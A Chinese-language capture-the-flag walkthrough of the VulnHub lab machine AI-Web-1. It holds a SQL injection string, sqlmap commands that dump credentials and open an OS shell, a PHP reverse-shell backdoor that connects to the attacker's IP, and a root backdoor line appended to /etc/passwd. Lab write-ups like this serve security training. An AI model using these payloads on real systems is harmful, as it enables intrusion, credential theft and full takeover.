標(biāo)簽：SQL注入、sqlmap寫(xiě)shell淌友、反彈shell、寫(xiě)入passwd提權(quán)

0x00 環(huán)境準(zhǔn)備

下載地址：https://www.vulnhub.com/entry/ai-web-1,353/
flag數(shù)量：1
攻擊機(jī)：kali
攻擊機(jī)地址：192.168.5.3
靶機(jī)描述：

Difficulty: Intermediate

Network: DHCP (Automatically assign)

Network Mode: NAT

This box is designed to test skills of penetration tester. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privileged shell and then escalate privilege to root. For any hint please tweet on @arif_xpress

0x01 信息搜集

1.探測(cè)靶機(jī)地址

命令：arp-scan -l

靶機(jī)地址是192.168.5.5

2.探測(cè)靶機(jī)開(kāi)放端口

命令：nmap -sV -p- 192.168.5.5

只開(kāi)放了80端口褂痰，看一下

啥也沒(méi)有亩进，掃描一下目錄吧

3.目錄掃描

命令：dirb http://192.168.5.5 -X .php,.html,.txt

使用默認(rèn)字典掃描出兩個(gè)頁(yè)面，看看robots.txt頁(yè)面

0x02 SQL注入

在robots.txt中發(fā)現(xiàn)了兩個(gè)目錄缩歪，分別是http://192.168.5.5/m3diNf0/和http://192.168.5.5/se3reTdir777/uploads/归薛。但是訪問(wèn)這兩個(gè)路徑都是403，試試訪問(wèn)http://192.168.5.5/se3reTdir777/

是個(gè)查詢(xún)頁(yè)面匪蝙，應(yīng)該有sql注入主籍，fuzz一下

果然有sql注入，經(jīng)過(guò)測(cè)試逛球，這是一個(gè)單引號(hào)閉合的顯錯(cuò)注入千元，3個(gè)字段，注釋要用#不能用--+颤绕。
數(shù)據(jù)庫(kù)：uid=1.1' union select 1,2,database() #

為了方便幸海，下面用sqlmap進(jìn)行注入
數(shù)據(jù)表：sqlmap -u http://192.168.5.5/se3reTdir777/ --data "uid=1&Operation=Submit" --batch -v 3 --level 3 -D aiweb1 --tables

有兩個(gè)數(shù)據(jù)表祟身，user表：sqlmap -u http://192.168.5.5/se3reTdir777/ --data "uid=1&Operation=Submit" --batch -v 3 --level 3 -D aiweb1 -T user --columns

顯然不是我們想要的數(shù)據(jù)。再看一下systemUser表
systemUser表：sqlmap -u http://192.168.5.5/se3reTdir777/ --data "uid=1&Operation=Submit" --batch -v 3 --level 3 -D aiweb1 -T systemUser --dump

這里有三組賬號(hào)密碼物独，看樣子密碼應(yīng)該是base64加密袜硫，解密一下。
解密后的賬號(hào)分別是：
t00r \ FakeUserPassw0rd
aiweb1pwn \ MyEvilPass_f908sdaf9_sadfasf0sa
u3er \ N0tThis0neAls0

0x03 sqlmap寫(xiě)shell

拿到了賬號(hào)密碼挡篓，但是并沒(méi)有登錄頁(yè)面婉陷。看了一下表哥的文章官研，表哥又掃描了目錄秽澳。那就再把上面的目錄掃描一下，看看有沒(méi)有子目錄戏羽。
分別掃描：http://192.168.5.5/m3diNf0/担神、http://192.168.5.5/se3reTdir777/uploads/和http://192.168.5.5/se3reTdir777/子目錄。
在http://192.168.5.5/m3diNf0/目錄下發(fā)現(xiàn)了info.php文件

訪問(wèn)看一下

是phpinfo頁(yè)面蛛壳，在這個(gè)頁(yè)面上有絕對(duì)路徑杏瞻，如果路徑有寫(xiě)權(quán)限的話，可以使用sqlmap寫(xiě)一個(gè)shell進(jìn)去衙荐。

這里可以看到捞挥，網(wǎng)站的根目錄是/home/www/html/web1x443290o2sdf92213。剛才在robots.txt文件中看到了http://192.168.5.5/se3reTdir777/uploads/目錄忧吟，uploads目錄雖然不能訪問(wèn)砌函，但是一般都具有寫(xiě)權(quán)限，嘗試把shell寫(xiě)入到uploads目錄下溜族，uploads的絕對(duì)路徑是/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/讹俊。
開(kāi)始寫(xiě)入，命令：sqlmap -u http://192.168.5.5/se3reTdir777/ --data "uid=1&Operation=Submit" --os-shell

寫(xiě)入成功

0x04 反彈shell

寫(xiě)入shell成功了煌抒，但是用著不太方便仍劈，再反彈一個(gè)shell吧。這里通過(guò)在靶機(jī)中wget一個(gè)php后門(mén)來(lái)反彈shell寡壮。
①首先制作一個(gè)php后門(mén)文件

代碼：

<?php
$sock=fsockopen("192.168.5.3",4444);
exec("/bin/bash -i <&3 >&3 2>&3");
?>

②在kali上運(yùn)行臨時(shí)服務(wù)器服務(wù)贩疙，命令：python -m SimpleHTTPServer 8000

③在靶機(jī)上下載文件，命令：wget http://192.168.5.3:8000/web1.php

④在kali上監(jiān)聽(tīng)4444端口况既，命令：nc -lvp 4444

⑤運(yùn)行靶機(jī)上的web1.php

kali上已經(jīng)接收到反彈的shell了

0x05 提權(quán)

反彈shell后这溅，whoami查詢(xún)當(dāng)前身份，是www-data
查詢(xún)/etc/passwd文件屬性棒仍，發(fā)現(xiàn)擁有者是www-data悲靴，并且擁有讀寫(xiě)權(quán)限

可以通過(guò)向/etc/passwd文件中添加用戶(hù)來(lái)提權(quán)：
①使用kali的openssl工具加密密碼，比如我想創(chuàng)建一個(gè)用戶(hù)名是dn的用戶(hù)莫其，密碼是111111癞尚。命令就是：openssl passwd -1 -salt dn 111111

②將剛才生成的密碼進(jìn)行整理耸三，生成/etc/passwd文件格式的字符串：dn:$1$dn$af67d2P6bAKTKU2Y5vwMV0:0:0::/root:/bin/bash
第一個(gè)冒號(hào)之前是用戶(hù)名，第一個(gè)冒號(hào)之后就是剛才生成的密碼浇揩，其余的照寫(xiě)就好了吕晌。

③在靶機(jī)上將上面這段字符串追加到/etc/passwd文件里面，命令：echo 'dn:$1$dn$af67d2P6bAKTKU2Y5vwMV0:0:0::/root:/bin/bash' >> /etc/passwd

注意這里一定要用單引號(hào)临燃，因?yàn)樽址杏?符號(hào)，如果使用雙引號(hào)會(huì)導(dǎo)致$被當(dāng)做變量去解析烙心。我在這弄了半天膜廊。

④然后在靶機(jī)上使用python彈一個(gè)交互式shell，我用python2報(bào)錯(cuò)淫茵，就用python3了爪瓜，命令：python3 -c "import pty;pty.spawn('/bin/bash')"

⑤輸入su dn，輸入密碼

flag在/root下匙瘪，切換到/root目錄拿到flag

0x06 小結(jié)

該靶機(jī)相對(duì)比較簡(jiǎn)單铆铆，從目錄掃描開(kāi)始，發(fā)現(xiàn)注入點(diǎn)丹喻，然后再次目錄掃描發(fā)現(xiàn)phpinfo文件薄货，使用sqlmap+phpinfo寫(xiě)shell，getshell之后反彈shell碍论，提權(quán)也非常簡(jiǎn)單谅猾，就是向/etc/passwd文件中追加root用戶(hù)即可。只是sql注入查到的3組用戶(hù)名密碼并沒(méi)有什么用鳍悠。

由于我不會(huì)每天都登錄簡(jiǎn)書(shū)税娜，所以有什么私信或者評(píng)論我都不能及時(shí)回復(fù)，如果想要聯(lián)系我最好給我發(fā)郵件藏研，郵箱：Z2djMjUxMTBAMTYzLmNvbQ==敬矩，如果發(fā)郵件請(qǐng)備注“簡(jiǎn)書(shū)”

參考鏈接

1.vulnhub靶機(jī)AI-WEB-1.0滲透測(cè)試
2.vulnhub之AI-web1
3.使用sqlmap曲折滲透某服務(wù)器